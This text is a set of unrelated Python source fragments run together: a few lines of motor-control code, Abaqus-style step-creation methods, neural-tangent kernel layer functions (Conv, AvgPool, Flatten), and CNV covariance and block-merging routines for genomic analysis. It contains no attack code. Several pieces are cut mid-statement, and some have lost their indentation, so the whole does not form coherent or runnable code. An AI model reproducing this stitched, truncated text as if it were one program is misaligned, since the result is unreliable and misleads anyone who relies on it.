self.duty_2_value = 10
self.select = 'p'
x='z'
elif x == 'w':
#print("forward")
#self.gyro.calibration()
self.duty_1_value = self.duty_1_value | |
representing the whole model. The default value is None.
Returns
-------
step: FrequencyStep
A FrequencyStep object.
"""
self.steps[name] = step = FrequencyStep(name, previous, eigensolver, numEigen, description, shift, minEigen,
maxEigen, vectors, maxIterations, blockSize, maxBlocks, normalization,
propertyEvaluationFrequency, projectDamping, acousticCoupling,
acousticRangeFactor, frictionDamping, matrixStorage, maintainAttributes,
simLinearDynamics, residualModes, substructureCutoffMultiplier,
firstCutoffMultiplier, secondCutoffMultiplier, residualModeRegion,
residualModeDof, limitSavedEigenvectorRegion)
return step
def GeostaticStep(self, name: str, previous: str, description: str = '', nlgeom: Boolean = OFF,
                  matrixSolver: SymbolicConstant = DIRECT,
                  matrixStorage: SymbolicConstant = SOLVER_DEFAULT, maintainAttributes: Boolean = False,
                  solutionTechnique: SymbolicConstant = FULL_NEWTON, reformKernel: int = 8,
                  convertSDI: SymbolicConstant = PROPAGATED, utol: float = None, timePeriod: float = 1,
                  timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
                  initialInc: float = None, minInc: float = None, maxInc: float = None) -> GeostaticStep:
    """Create a GeostaticStep and register it in this model's step repository.

    Accessible via ``mdb.models[name].GeostaticStep``.

    Parameters
    ----------
    name
        Repository key for the new step.
    previous
        Name of the preceding step; the new step is inserted after it in the
        list of analysis steps.
    description
        Description of the new step (default: empty string).
    nlgeom
        Whether to account for geometric nonlinearities (default: OFF).
    matrixSolver
        Solver type: DIRECT or ITERATIVE (default: DIRECT).
    matrixStorage
        Matrix storage: SYMMETRIC, UNSYMMETRIC, or SOLVER_DEFAULT
        (default: SOLVER_DEFAULT).
    maintainAttributes
        Whether to retain attributes from an existing step with the same name
        (default: False).
    solutionTechnique
        Nonlinear solution technique: FULL_NEWTON or QUASI_NEWTON
        (default: FULL_NEWTON).
    reformKernel
        Number of quasi-Newton iterations allowed before the kernel matrix is
        reformed (default: 8).
    convertSDI
        Whether to force a new iteration on severe discontinuities:
        PROPAGATED, CONVERT_SDI_OFF, or CONVERT_SDI_ON (default: PROPAGATED).
    utol
        None, or the tolerance for the maximum change of displacements
        (default: None).
    timePeriod
        Total time period (default: 1.0); ignored unless
        *timeIncrementationMethod*=AUTOMATIC.
    timeIncrementationMethod
        Time incrementation method: FIXED or AUTOMATIC (default: AUTOMATIC).
    maxNumInc
        Maximum number of increments per step (default: 100).
    initialInc
        Initial time increment; defaults to the step's total time period.
        Ignored unless *timeIncrementationMethod*=AUTOMATIC.
    minInc
        Minimum allowed time increment; defaults to the smaller of the
        suggested initial increment or 1e-5 times the total time period.
        Ignored unless *timeIncrementationMethod*=AUTOMATIC.
    maxInc
        Maximum allowed time increment; defaults to the step's total time
        period. Ignored unless *timeIncrementationMethod*=AUTOMATIC.

    Returns
    -------
    step: GeostaticStep
        The newly created GeostaticStep object.
    """
    step = GeostaticStep(name, previous, description, nlgeom, matrixSolver,
                         matrixStorage, maintainAttributes, solutionTechnique,
                         reformKernel, convertSDI, utol, timePeriod,
                         timeIncrementationMethod, maxNumInc, initialInc,
                         minInc, maxInc)
    # Registering under `name` replaces any existing step with that key.
    self.steps[name] = step
    return step
def HeatTransferStep(self, name: str, previous: str, description: str = '', response: SymbolicConstant = TRANSIENT,
                     timePeriod: float = 1, timeIncrementationMethod: SymbolicConstant = AUTOMATIC,
                     maxNumInc: int = 100, initialInc: float = None, minInc: float = None,
                     maxInc: float = None, end: float = None, deltmx: float = 0, mxdem: float = 0,
                     amplitude: SymbolicConstant = STEP, extrapolation: SymbolicConstant = LINEAR,
                     matrixSolver: SymbolicConstant = DIRECT,
                     matrixStorage: SymbolicConstant = SOLVER_DEFAULT, maintainAttributes: Boolean = False,
                     solutionTechnique: SymbolicConstant = FULL_NEWTON, reformKernel: int = 8,
                     convertSDI: SymbolicConstant = PROPAGATED) -> HeatTransferStep:
    """Create a HeatTransferStep and register it in this model's step repository.

    Accessible via ``mdb.models[name].HeatTransferStep``.

    Parameters
    ----------
    name
        Repository key for the new step.
    previous
        Name of the preceding step; the new step is inserted after it in the
        list of analysis steps.
    description
        Description of the new step (default: empty string).
    response
        Analysis type: STEADY_STATE or TRANSIENT (default: TRANSIENT).
    timePeriod
        Total time period (default: 1.0).
    timeIncrementationMethod
        Time incrementation method: FIXED or AUTOMATIC (default: AUTOMATIC).
    maxNumInc
        Maximum number of increments per step (default: 100).
    initialInc
        Initial time increment; defaults to the step's total time period.
    minInc
        Minimum allowed time increment; defaults to the smaller of 0.8 times
        the initial time increment or 1e-5 times the total time period.
    maxInc
        Maximum allowed time increment; defaults to the step's total time
        period.
    end
        None, or the temperature change rate (temperature per time) used to
        define steady state: the solution terminates once all nodal
        temperatures change slower than this rate (default: None). Ignored
        unless *response*=STEADY_STATE.
    deltmx
        Maximum temperature change allowed per increment during a transient
        analysis (default: 0.0).
    mxdem
        Maximum allowable emissivity change with temperature and field
        variables per increment (default: 0.1).
    amplitude
        Amplitude variation for loading magnitudes: STEP or RAMP
        (default: STEP).
    extrapolation
        Extrapolation type for the incremental nonlinear solution: NONE,
        LINEAR, or PARABOLIC (default: LINEAR).
    matrixSolver
        Solver type: DIRECT or ITERATIVE (default: DIRECT).
    matrixStorage
        Matrix storage: SYMMETRIC, UNSYMMETRIC, or SOLVER_DEFAULT
        (default: SOLVER_DEFAULT).
    maintainAttributes
        Whether to retain attributes from an existing step with the same name
        (default: False).
    solutionTechnique
        Nonlinear solution technique: FULL_NEWTON or QUASI_NEWTON
        (default: FULL_NEWTON).
    reformKernel
        Number of quasi-Newton iterations allowed before the kernel matrix is
        reformed (default: 8).
    convertSDI
        Whether to force a new iteration on severe discontinuities:
        PROPAGATED, CONVERT_SDI_OFF, or CONVERT_SDI_ON (default: PROPAGATED).

    Returns
    -------
    step: HeatTransferStep
        The newly created HeatTransferStep object.
    """
    step = HeatTransferStep(name, previous, description, response, timePeriod,
                            timeIncrementationMethod, maxNumInc, initialInc,
                            minInc, maxInc, end, deltmx, mxdem, amplitude,
                            extrapolation, matrixSolver, matrixStorage,
                            maintainAttributes, solutionTechnique,
                            reformKernel, convertSDI)
    # Registering under `name` replaces any existing step with that key.
    self.steps[name] = step
    return step
def ImplicitDynamicsStep(self, name: str, previous: str, description: str = '', timePeriod: float = 1,
nlgeom: Boolean = OFF, matrixStorage: SymbolicConstant = SOLVER_DEFAULT,
application: SymbolicConstant = ANALYSIS_PRODUCT_DEFAULT, adiabatic: Boolean = OFF,
timeIncrementationMethod: SymbolicConstant = AUTOMATIC, maxNumInc: int = 100,
initialInc: float = None, minInc: float = None,
maxInc: typing.Union[SymbolicConstant, float] = DEFAULT,
hafTolMethod: SymbolicConstant = VALUE, haftol: float = None,
halfIncScaleFactor: float = None, nohaf: Boolean = OFF,
amplitude: SymbolicConstant = STEP,
alpha: typing.Union[SymbolicConstant, float] = DEFAULT,
initialConditions: SymbolicConstant = DEFAULT,
extrapolation: SymbolicConstant = ANALYSIS_PRODUCT_DEFAULT, noStop: Boolean = OFF,
maintainAttributes: Boolean = False, solutionTechnique: SymbolicConstant = FULL_NEWTON,
reformKernel: int = 8, convertSDI: SymbolicConstant = PROPAGATED) -> ImplicitDynamicsStep:
"""This method creates an ImplicitDynamicsStep object.
Notes
-----
This function can be accessed by:
.. code-block:: python
mdb.models[name].ImplicitDynamicsStep
Parameters
----------
name
A String specifying the repository key.
previous
A String specifying the name of the previous step. | |
if padding == Padding.CIRCULAR:
init_padding = Padding.SAME
def input_total_dim(input_shape):
return input_shape[lhs_spec.index('C')] * np.prod(filter_shape)
ntk_init_fn, _ = ostax.GeneralConv(dimension_numbers, out_chan, filter_shape,
strides, init_padding.name, W_init, b_init)
def standard_init_fn(rng, input_shape):
output_shape, (W, b) = ntk_init_fn(rng, input_shape)
norm = W_std / np.sqrt(input_total_dim(input_shape))
return output_shape, (W * norm, b * b_std)
if parameterization == 'ntk':
init_fn = ntk_init_fn
elif parameterization == 'standard':
init_fn = standard_init_fn
else:
raise ValueError('Parameterization not supported: %s' % parameterization)
def apply_fn(params, inputs, **kwargs):
W, b = params
if parameterization == 'ntk':
norm = W_std / np.sqrt(input_total_dim(inputs.shape))
b_rescale = b_std
elif parameterization == 'standard':
norm = 1.
b_rescale = 1.
apply_padding = padding
if padding == Padding.CIRCULAR:
apply_padding = Padding.VALID
inputs = _same_pad_for_filter_shape(inputs, filter_shape, strides, (1, 2),
'wrap')
return norm * lax.conv_general_dilated(
inputs,
W,
strides,
apply_padding.name,
dimension_numbers=dimension_numbers) + b_rescale * b
def kernel_fn(kernels):
"""Compute the transformed kernels after a conv layer."""
var1, nngp, var2, ntk, is_height_width, marginal, cross = (
kernels.var1, kernels.nngp, kernels.var2, kernels.ntk,
kernels.is_height_width, kernels.marginal, kernels.cross)
if cross > M.OVER_PIXELS and not is_height_width:
filter_shape_nngp = filter_shape[::-1]
strides_nngp = strides[::-1]
else:
filter_shape_nngp = filter_shape
strides_nngp = strides
if cross == M.OVER_PIXELS:
def conv_nngp_unscaled(x):
if _is_array(x):
x = _conv_nngp_4d(x, filter_shape_nngp, strides_nngp, padding)
return x
elif cross in [M.OVER_POINTS, M.NO]:
def conv_nngp_unscaled(x):
if _is_array(x):
x = _conv_nngp_5or6d_double_conv(x, filter_shape_nngp,
strides_nngp, padding)
return x
is_height_width = not is_height_width
else:
raise NotImplementedError(
"Only implemented for `OVER_PIXELS`, `OVER_POINTS` and `NO`;"
" supplied {}".format(cross))
def conv_nngp(x):
x = conv_nngp_unscaled(x)
return _affine(x, W_std, b_std)
if marginal == M.OVER_PIXELS:
def conv_var(x):
x = _conv_var_3d(x, filter_shape_nngp, strides_nngp, padding)
x = _affine(x, W_std, b_std)
return x
elif marginal in [M.OVER_POINTS, M.NO]:
def conv_var(x):
if _is_array(x):
x = _conv_nngp_5or6d_double_conv(x, filter_shape_nngp,
strides_nngp, padding)
x = _affine(x, W_std, b_std)
return x
else:
raise NotImplementedError(
"Only implemented for `OVER_PIXELS`, `OVER_POINTS` and `NO`;"
" supplied {}".format(marginal))
var1 = conv_var(var1)
var2 = conv_var(var2)
if parameterization == 'ntk':
nngp = conv_nngp(nngp)
ntk = conv_nngp(ntk) + nngp - b_std**2 if ntk is not None else ntk
elif parameterization == 'standard':
nngp_unscaled = conv_nngp_unscaled(nngp)
if ntk is not None:
ntk = (
input_total_dim(kernels.shape1) * nngp_unscaled + 1. +
W_std**2 * conv_nngp_unscaled(ntk))
nngp = _affine(nngp_unscaled, W_std, b_std)
return kernels._replace(
var1=var1, nngp=nngp, var2=var2, ntk=ntk, is_gaussian=True,
is_height_width=is_height_width, marginal=marginal, cross=cross)
setattr(kernel_fn, _COVARIANCES_REQ, {'marginal': M.OVER_PIXELS,
'cross': M.OVER_PIXELS})
return init_fn, apply_fn, kernel_fn
def Conv(out_chan, filter_shape, strides=None, padding=Padding.VALID.name,
         W_std=1.0, W_init=_randn(1.0), b_std=0.0, b_init=_randn(1.0),
         parameterization='ntk'):
    """Layer construction function for a convolution layer.

    A thin wrapper around `_GeneralConv` with the dimension numbers fixed to
    the default `_CONV_DIMENSION_NUMBERS`. Based on
    `jax.experimental.stax.Conv`, with a similar API apart from:

    `W_init` and `b_init` only change the behavior of the finite width
    network and are not used by `kernel_fn`; in most cases `W_std` and
    `b_std` should be used instead.

    Args:
      padding: in addition to `VALID` and `SAME` padding, supports
        `CIRCULAR`, not available in `jax.experimental.stax.GeneralConv`.
      parameterization: either 'ntk' or 'standard' — the direct convolution
        analogues of the corresponding Dense-layer parameterizations.
    """
    dimension_numbers = _CONV_DIMENSION_NUMBERS
    return _GeneralConv(dimension_numbers, out_chan, filter_shape, strides,
                        padding, W_std, W_init, b_std, b_init,
                        parameterization)
def _average_pool_nngp_5or6d(mat, window_shape, strides, padding,
                             normalize_edges):
    """Get covariances of average pooling outputs given inputs covariances.

    Args:
      mat: a 5D or 6D `np.ndarray` of sample-(sample-)pixel-pixel covariances
        with shape `[batch_size_1, (batch_size_2,) height, height, width,
        width]`; non-array values are passed through unchanged.
      window_shape: tuple of two positive integers, the pooling spatial shape
        (e.g. `(3, 3)`).
      strides: tuple of two positive integers, the pooling strides,
        e.g. `(1, 1)`.
      padding: a `Padding` enum, e.g. `Padding.CIRCULAR`.
      normalize_edges: `True` to normalize output by the effective receptive
        field, `False` to normalize by the window size. Only has effect at
        the edges when `SAME` padding is used. Set to `True` to retain
        correspondence to `ostax.AvgPool`.

    Returns:
      a 5D or 6D `np.ndarray` of sample-(sample-)pixel-pixel covariances of
      the average pooling outputs, with shape `[batch_size_1, (batch_size_2,)
      new_height, new_height, new_width, new_width]`.
    """
    if not _is_array(mat):
        return mat
    if padding == Padding.CIRCULAR:
        # Circular padding: wrap-pad the four pixel axes explicitly, then
        # pool the enlarged tensor with VALID padding.
        spatial_axes = tuple(range(mat.ndim)[-4:])
        mat = _same_pad_for_filter_shape(mat, _double_tuple(window_shape),
                                         _double_tuple(strides), spatial_axes,
                                         'wrap')
        padding = Padding.VALID
    # Expand the 2D spatial window/strides to cover all four pixel axes,
    # leaving the leading batch axes untouched.
    lead = (1,) * (mat.ndim - 4)
    full_window = lead + _double_tuple(window_shape)
    full_strides = lead + _double_tuple(strides)
    pooled = lax.reduce_window(mat, 0., lax.add, full_window, full_strides,
                               padding.name)
    if padding == Padding.SAME and normalize_edges:
        # `SAME` padding in `jax.experimental.stax.AvgPool` normalizes by the
        # actual window size, which is smaller at the edges; mirror that by
        # counting contributing entries per output position.
        ones = np.ones(mat.shape, mat.dtype)
        effective_sizes = lax.reduce_window(ones, 0., lax.add, full_window,
                                            full_strides, padding.name)
        pooled = pooled / effective_sizes
    else:
        pooled = pooled / np.prod(full_window)
    return pooled
@_layer
def AvgPool(window_shape,
            strides=None,
            padding=Padding.VALID.name,
            normalize_edges=True):
    """Layer construction function for a 2D average pooling layer.

    Returns the `(init_fn, apply_fn, kernel_fn)` triple for the layer.
    Based on `jax.experimental.stax.AvgPool`. Has a similar API apart from:

    Args:
      padding: in addition to `VALID` and `SAME' padding, supports `CIRCULAR`,
        not available in `jax.experimental.stax.GeneralConv`.
      normalize_edges: `True` to normalize output by the effective receptive
        field, `False` to normalize by the window size. Only has effect at the
        edges when `SAME` padding is used. Set to `True` to retain correspondence
        to `ostax.AvgPool`.
    """
    strides = strides or (1,) * len(window_shape)
    padding = Padding(padding)
    if padding == Padding.CIRCULAR:
        # Circular padding: init as if SAME (same output shapes), but apply
        # by explicitly wrap-padding the inputs and pooling with VALID.
        init_fn, _ = ostax.AvgPool(window_shape, strides, Padding.SAME.name)
        _, apply_fn_0 = ostax.AvgPool(window_shape, strides, Padding.VALID.name)
        def apply_fn(params, inputs, **kwargs):
            # Wrap-pad the two spatial axes (1, 2) before VALID pooling.
            inputs = _same_pad_for_filter_shape(inputs, window_shape, strides, (1, 2),
                                                'wrap')
            res = apply_fn_0(params, inputs, **kwargs)
            return res
    elif not normalize_edges:
        # Normalize by the full window size everywhere, rather than by the
        # (smaller) effective receptive field at the edges.
        def rescaler(*args, **kwargs):
            del args, kwargs  # Unused.
            return lambda outputs, _: outputs / np.prod(window_shape)
        # NOTE(review): relies on the private `ostax._pooling_layer` API.
        avgPool = ostax._pooling_layer(lax.add, 0., rescaler)
        init_fn, apply_fn = avgPool(window_shape, strides, padding.name)
    else:
        init_fn, apply_fn = ostax.AvgPool(window_shape, strides, padding.name)
    def kernel_fn(kernels):
        """Kernel transformation: average-pool all pixel-pixel covariances."""
        var1, nngp, var2, ntk, is_gaussian, is_height_width, marginal, cross = (
            kernels.var1, kernels.nngp, kernels.var2, kernels.ntk,
            kernels.is_gaussian, kernels.is_height_width, kernels.marginal,
            kernels.cross)
        # If the kernel is stored width-first, swap the spatial window/strides
        # to match.
        if is_height_width:
            window_shape_nngp = window_shape
            strides_nngp = strides
        else:
            window_shape_nngp = window_shape[::-1]
            strides_nngp = strides[::-1]
        nngp = _average_pool_nngp_5or6d(nngp, window_shape_nngp, strides_nngp,
                                        padding, normalize_edges)
        ntk = _average_pool_nngp_5or6d(ntk, window_shape_nngp, strides_nngp,
                                       padding, normalize_edges)
        var1 = _average_pool_nngp_5or6d(var1, window_shape_nngp, strides_nngp,
                                        padding, normalize_edges)
        if var2 is not None:
            var2 = _average_pool_nngp_5or6d(var2, window_shape_nngp, strides_nngp,
                                            padding, normalize_edges)
        return kernels._replace(
            var1=var1, nngp=nngp, var2=var2, ntk=ntk, is_gaussian=is_gaussian,
            is_height_width=is_height_width, marginal=marginal, cross=cross)
    # Declare the covariance layout this kernel_fn requires from upstream.
    setattr(kernel_fn, _COVARIANCES_REQ, {'marginal': M.OVER_POINTS,
                                          'cross': M.NO})
    return init_fn, apply_fn, kernel_fn
@_layer
def GlobalAvgPool():
    """Layer construction function for a global average pooling layer.

    Averages over (and removes, `keepdims=False`) every inner dimension
    (axes 1 through -2), appropriate for `NHWC`, `NWHC`, `CHWN`, `CWHN`
    inputs.

    Warnings: assumes the next layer will be Dense (optionally preceded by a
    nonlinearity), otherwise the kernels will not be correct.
    """
    warnings.warn("GlobalAvgPool assumes the next layer will be Dense"
                  " (optionally preceded by a nonlinearity),"
                  " otherwise the kernels will not be correct!")

    def init_fn(rng, input_shape):
        # Output retains only the batch and channel dimensions; no parameters.
        return (input_shape[0], input_shape[-1]), ()

    def apply_fn(params, inputs, **kwargs):
        # Average over every axis except batch (0) and channel (-1).
        inner_axes = tuple(range(1, inputs.ndim - 1))
        return np.mean(inputs, axis=inner_axes)

    def kernel_fn(kernels):
        def pool_spatial(mat):
            # Average over the four trailing pixel-pixel covariance axes.
            axes = tuple(range(mat.ndim)[-4:])
            return np.mean(mat, axis=axes)

        nngp = pool_spatial(kernels.nngp)
        ntk = pool_spatial(kernels.ntk) if _is_array(kernels.ntk) else kernels.ntk
        var1 = pool_spatial(kernels.var1)
        var2 = None if kernels.var2 is None else pool_spatial(kernels.var2)
        return kernels._replace(
            var1=var1, nngp=nngp, var2=var2, ntk=ntk,
            is_gaussian=kernels.is_gaussian, is_height_width=True,
            marginal=M.OVER_ALL, cross=M.OVER_ALL)

    # Declare the covariance layout this kernel_fn requires from upstream.
    setattr(kernel_fn, _COVARIANCES_REQ, {'marginal': M.OVER_POINTS,
                                          'cross': M.NO})
    return init_fn, apply_fn, kernel_fn
@_layer
def Flatten():
"""Layer construction function for flattening all but the leading dim.
Based on `jax.experimental.stax.Flatten`. Has a similar API.
Warnings: assumes the next layer will be Dense (optionally preceded by
a nonlinearity), otherwise the kernels will not be correct
"""
warnings.warn("Flatten assumes the next layer will be Dense"
" (optionally preceded by a nonlinearity),"
" otherwise the kernels will not be correct!")
init_fn, apply_fn = ostax.Flatten
def kernel_fn(kernels):
"""Compute kernels."""
var1, nngp, var2, ntk, is_gaussian, marginal, cross = (
kernels.var1, kernels.nngp, kernels.var2, kernels.ntk,
kernels.is_gaussian, kernels.marginal, kernels.cross)
if nngp.ndim == 2:
return kernels
def trace(x):
count = x.shape[-4] * x.shape[-2]
y = np.trace(x, axis1=-2, axis2=-1)
z = np.trace(y, axis1=-2, axis2=-1)
return z / count
if marginal == M.OVER_PIXELS:
var1 = np.mean(var1, axis=(1, 2))
var2 = var2 if var2 is None else np.mean(var2, axis=(1, 2))
elif marginal in [M.OVER_POINTS, M.NO]:
if marginal == M.NO:
var1 = np.moveaxis(np.diagonal(var1, axis1=0, axis2=1), -1, 0)
if var2 is not None:
var2 = np.moveaxis(np.diagonal(var2, axis1=0, axis2=1), -1, 0)
var1 = trace(var1)
var2 = var2 if var2 is None else trace(var2)
elif marginal != M.OVER_ALL:
raise NotImplementedError(
"Only implemented for , `OVER_ALL`, `OVER_PIXELS`, `OVER_POINTS` and "
" `NO`; supplied {}".format(marginal))
if cross == | |
null_variance,
cs_val, block_merge_dist)
hpo_info['blocks'][block_id] = {'coords' : block,
'refine_res' : refine_res,
'credset_coords' : credset_coords,
'credset_bt' : credset_bt,
'credset_windows' : credset_windows}
# If no windows are significant, add empty placeholder dict for all windows
else:
hpo_info['all_windows'] = {}
return hpo_info
def load_all_hpos(statslist, secondary_p_cutoff=0.05, n_nominal_cutoff=2,
                  secondary_or_nominal=True, fdr_q_cutoff=0.05,
                  secondary_for_fdr=False, block_merge_dist=200000,
                  block_prefix='window_block', refine_secondary=False,
                  cs_val=0.95):
    """
    Wrapper function to process each HPO with process_hpo()

    `statslist` is a tab-delimited file with one row per HPO:
    (HPO code, path to its stats file, primary p-value cutoff in -log10
    space). All remaining keyword arguments are forwarded to process_hpo().

    Returns a dict with one entry per HPO
    """
    hpo_data = {}
    with open(statslist) as fin:
        for hpo, stats_in, pval in csv.reader(fin, delimiter='\t'):
            print('Loading data from {}...'.format(hpo))
            hpo_data[hpo] = process_hpo(
                hpo, stats_in, float(pval), p_is_neg_log10=True,
                secondary_p_cutoff=secondary_p_cutoff,
                n_nominal_cutoff=n_nominal_cutoff,
                secondary_or_nominal=secondary_or_nominal,
                fdr_q_cutoff=fdr_q_cutoff,
                secondary_for_fdr=secondary_for_fdr,
                block_merge_dist=block_merge_dist,
                block_prefix=block_prefix,
                refine_secondary=refine_secondary,
                cs_val=cs_val)
    return hpo_data
def calc_cnv_cov(cnvbed, hpo_data, cnv, frac=0.5, max_search_dist=20000000):
    """
    Compute a CNV covariance matrix for cases from each HPO per chromosome

    Covariance between two windows is the Jaccard index of the sets of CNV
    IDs overlapping each window.

    Parameters
    ----------
    cnvbed : str
        Path to a BED file of CNVs. Column 4 (index 3) is the CNV ID and
        column 5 (index 4) the CNV type; column 6 (index 5) is matched
        against the HPO code — presumably a delimited list of carrier HPO
        terms (TODO confirm against the CNV BED format).
    hpo_data : dict
        Per-HPO data (see load_all_hpos()); window IDs in 'all_windows' are
        '<chrom>_<start>_<end>' strings.
    cnv : str
        CNV type to restrict to; 'NS' keeps all types.
    frac : float
        Minimum fraction of each window a CNV must overlap (bedtools -F).
    max_search_dist : int
        Window pairs whose midpoints are further apart than this are assigned
        covariance 0.0 without computing the Jaccard index.

    Returns
    -------
    dict
        cnv_cov[hpo][contig] = pandas DataFrame of pairwise Jaccard indexes.
    """
    cnv_cov = {}
    cnvbt_orig = pbt.BedTool(cnvbed)
    contigs = set([x.chrom for x in cnvbt_orig])
    # Iterate over each HPO
    for hpo, hdat in hpo_data.items():
        print('Computing covariance matrixes for {}...'.format(hpo))
        # Make single bedtool of all windows per contig
        # (window IDs decompose as chrom/start/end)
        wbt_dict = {contig : {'all_wids' : set()} for contig in contigs}
        for wid in hdat['all_windows'].keys():
            contig = wid.split('_')[0]
            wbt_dict[contig]['all_wids'].add(wid)
        for contig in contigs:
            wbt_str = ''
            for wid in wbt_dict[contig]['all_wids']:
                # BED line: chrom, start, end, window ID
                wbt_str += '\t'.join(wid.split('_') + [wid]) + '\n'
            wbt_dict[contig]['wbt'] = pbt.BedTool(wbt_str, from_string=True)
        # Filter CNVs by HPO and CNV type
        cnvbt = cnvbt_orig.filter(lambda x: hpo in x[5])
        if cnv != 'NS':
            cnvbt = cnvbt.filter(lambda x: x[4] == cnv).saveas()
        # Make covariance matrix of all by all windows per chromosome
        cov_dfs = {}
        for contig in contigs:
            # Filter CNVs and windows to contig of interest
            cnvbt_contig = cnvbt.filter(lambda x: x.chrom == contig)
            wbt_contig = wbt_dict[contig]['wbt']
            all_contig_wids = wbt_dict[contig]['all_wids']
            # Make dict mapping window ID to dict of set(CNV ids)
            cnvs_per_window = {wid : set() for wid in all_contig_wids}
            for hit in cnvbt_contig.intersect(wbt_contig, wa=True, wb=True, F=frac):
                cnvid = hit[3]
                wid = hit[-1]
                cnvs_per_window[wid].add(cnvid)
            # Compute covarance for all pairs of windows
            cov_dfs[contig] = pd.DataFrame(columns=all_contig_wids)
            for wid_a in all_contig_wids:
                jac_l = []
                # If first window has no CNVs, Jaccard index = 0 for all mates
                cnvs_a = cnvs_per_window[wid_a]
                if len(cnvs_a) == 0:
                    cov_dfs[contig].loc[wid_a] = [0.0] * len(all_contig_wids)
                    continue
                for wid_b in all_contig_wids:
                    # If the Jaccard index has already been computed,
                    # can copy value across matrix diagonal
                    # (rows are filled one at a time, so wid_b being present
                    # in the index means its row was already finished)
                    if wid_b in cov_dfs[contig].index:
                        jac_l.append(cov_dfs[contig].loc[wid_b, wid_a])
                        continue
                    # If second window has no CNVs, Jaccard index = 0
                    cnvs_b = cnvs_per_window[wid_b]
                    if len(cnvs_b) == 0:
                        jac_l.append(0.0)
                        continue
                    # Otherwise, compute Jaccard index as long as windows are
                    # closer than max_search_dist apart
                    # (midpoints are re-parsed from the window IDs)
                    mid_a = np.mean([int(x) for x in wid_a.split('_')[1:]])
                    mid_b = np.mean([int(x) for x in wid_b.split('_')[1:]])
                    if np.abs(mid_b - mid_a) > max_search_dist:
                        jac_l.append(0.0)
                    else:
                        jac_l.append(len(cnvs_a.intersection(cnvs_b)) / len(cnvs_a.union(cnvs_b)))
                cov_dfs[contig].loc[wid_a] = jac_l
        cnv_cov[hpo] = cov_dfs
    return cnv_cov
def merge_blocks_by_cov(hpo_data, cnv_cov, jac_cutoff=0.8,
                        block_merge_dist=200000, cs_val=0.95,
                        block_prefix='window_block'):
    """
    Merge blocks from the same HPO by CNV covariance

    Blocks whose credible-set windows share CNV carriers (any pairwise
    Jaccard index >= jac_cutoff) are linked; each connected group of two or
    more blocks is collapsed into a single merged block: windows are pooled,
    refinement is re-run with flat priors, and the member blocks are removed.
    Modifies `hpo_data` in place and returns it.

    Parameters
    ----------
    hpo_data : dict
        Per-HPO data; each entry must contain 'blocks' and 'all_windows'.
    cnv_cov : dict
        Per-HPO, per-contig covariance DataFrames from calc_cnv_cov().
    jac_cutoff : float
        Minimum Jaccard index between any pair of credible-set windows for
        two blocks to be considered the same association.
    block_merge_dist : int
        Buffer passed to refine() when merging credible-set intervals.
    cs_val : float
        Credible-set mass passed to refine().
    block_prefix : str
        Used when composing the IDs of newly merged blocks.
    """
    for hpo, hdat in hpo_data.items():
        all_bids = list(hdat['blocks'].keys())
        # Construct graph of all blocks
        G = nx.Graph()
        for bid in all_bids:
            G.add_node(bid)
        # Add edges between pairs of nodes where at least one pair of windows from
        # their credible intervals shares CNV cov >= jac_cutoff
        for bid_a in all_bids:
            chrom_a = hdat['blocks'][bid_a]['credset_coords'][0][0]
            for bid_b in all_bids:
                chrom_b = hdat['blocks'][bid_b]['credset_coords'][0][0]
                # Only process nonredundant block pairs on the same chromosome
                if bid_a == bid_b or chrom_a != chrom_b:
                    continue
                cov_df = cnv_cov[hpo][chrom_a]
                wids_a = hdat['blocks'][bid_a]['credset_windows']
                wids_b = hdat['blocks'][bid_b]['credset_windows']
                # Restrict covariance to the two blocks' credible-set windows
                cov_df = cov_df.loc[cov_df.index.isin(wids_a),
                                    cov_df.columns.isin(wids_b)]
                best_jac = cov_df.max().max()
                if best_jac >= jac_cutoff:
                    G.add_edge(bid_a, bid_b)
        # Collapse all subgraphs of two or more nodes
        k = 0
        for cluster in nx.connected_components(G):
            if len(cluster) > 1:
                k += 1
                new_bid = '_'.join([hpo, block_prefix, 'merged', str(k)])
                # Take union of all windows
                windows = set()
                for bid in cluster:
                    windows.update(hdat['blocks'][bid]['refine_res'].keys())
                # Update refinement (flat prior over the pooled windows)
                window_priors = {window : 1 / len(windows) for window in windows}
                refine_res, credset_coords, credset_bt, credset_windows = \
                    refine(window_priors, hdat['all_windows'], cs_val=cs_val,
                           cs_merge_buffer=block_merge_dist)
                # Determine maximum significance level of any window in credible set
                if any([hdat['all_windows'][wid]['gw_sig'] for wid in credset_windows]):
                    credset_max_sig = 'genome_wide'
                elif any([hdat['all_windows'][wid]['fdr_sig'] for wid in credset_windows]):
                    credset_max_sig = 'FDR'
                else:
                    credset_max_sig = 'not_significant'
                # Add new merged block to hpo_data
                # (huge `d` collapses the credible set into a single interval)
                block = credset_bt.merge(d=int(10e10))
                hpo_data[hpo]['blocks'][new_bid] = \
                    {'coords' : block,
                     'refine_res' : refine_res,
                     'credset_coords' : credset_coords,
                     'credset_bt' : credset_bt,
                     'credset_windows' : credset_windows,
                     'credset_max_sig' : credset_max_sig}
                # Remove all original member blocks
                for bid in cluster:
                    hpo_data[hpo]['blocks'].pop(bid)
    return hpo_data
def clump_windows(cov_df, sig_wids, jac_cutoff=0.2):
    """
    Group windows into clumps of non-independent windows.

    inputs:
        cov_df : an input matrix of CNV covariance for pairs of windows
                 (rows must include sig_wids; columns are all candidate windows)
        sig_wids : window IDs of significant windows; edges are only drawn
                   outward from these
        jac_cutoff : minimum Jaccard index to treat windows as non-independent
    outputs:
        a list of clumps of window IDs; only connected components containing
        at least two significant windows are reported
    """
    graph = nx.Graph()
    graph.add_nodes_from(cov_df.columns)
    # Connect each significant window to every window it shares sufficient
    # CNV coverage with, recording the Jaccard index on the edge
    for swid in sig_wids:
        for owid in cov_df.columns:
            jac_val = cov_df.loc[swid, owid]
            if jac_val >= jac_cutoff:
                graph.add_edge(swid, owid, jac=jac_val)
    sig_set = set(sig_wids)
    return [list(component) for component in nx.connected_components(graph)
            if len(sig_set.intersection(component)) > 1]
def split_blocks_by_cov(hpo_data, cnv_cov, jac_cutoff=0.2, block_prefix='window_block',
                        null_variance=0.42 ** 2, cs_val=0.95):
    """
    Split blocks into independent sub-blocks based on CNV covariance.

    hpo_data : dict keyed by HPO; each entry holds 'sig_windows', 'blocks',
               and 'all_windows'
    cnv_cov : per-HPO, per-chromosome DataFrames of pairwise CNV covariance
    jac_cutoff : minimum Jaccard index to treat windows as non-independent
    block_prefix : prefix used when naming newly split blocks
    null_variance : null variance forwarded to refine()
    cs_val : credible set value forwarded to refine()

    Returns the (mutated) hpo_data with split blocks added and the original
